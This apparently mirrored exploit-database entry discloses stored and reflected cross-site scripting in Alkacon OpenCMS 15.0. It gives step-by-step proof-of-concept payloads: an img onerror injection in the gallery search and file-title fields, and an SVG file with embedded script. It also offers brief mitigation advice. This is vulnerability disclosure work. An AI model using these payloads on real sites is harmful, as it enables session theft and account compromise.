header-logo
Suggest Exploit
vendor:
OpenCMS
by:
tmrswrr
8.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: OpenCMS
Affected Version From: Alkacon OpenCMS 15.0
Affected Version To: Alkacon OpenCMS 15.0
Patch Exists: NO
Related CWE: CVE-2023-XXXX
CPE: alkacon:opencms:15.0
Metasploit:
Other Scripts:
Platforms Tested:
2023

Alkacon OpenCMS 15.0 – Multiple Cross-Site Scripting (XSS)

The Alkacon OpenCMS version 15.0 is vulnerable to multiple cross-site scripting (XSS) attacks. An attacker can exploit these vulnerabilities by injecting malicious scripts into various parameters and fields, leading to the execution of arbitrary code in the context of the user's browser.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate user input before displaying it on web pages. Additionally, implementing a web application firewall (WAF) can help detect and block XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
# Date: 1/07/2023
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: v15.0


POC:

1 ) Login in demo page , go to this url
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
2 ) Click /.galleries/ , after right click any png file  , open gallery, write in search button this payload
<img src=. onerror=alert(document.domain)>
3 ) You will be see alert box

POC:

1 ) Go to this url , right click any png file, rename title section and write your payload :  <img src=. onerror=alert(document.domain)>
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
2 ) You will be see alert box , stored xss 

POC:

1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file
after save it 

svg file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>

2 ) When click this svg file you will be see alert button

Navigation

Suggest Exploit

Services By CQR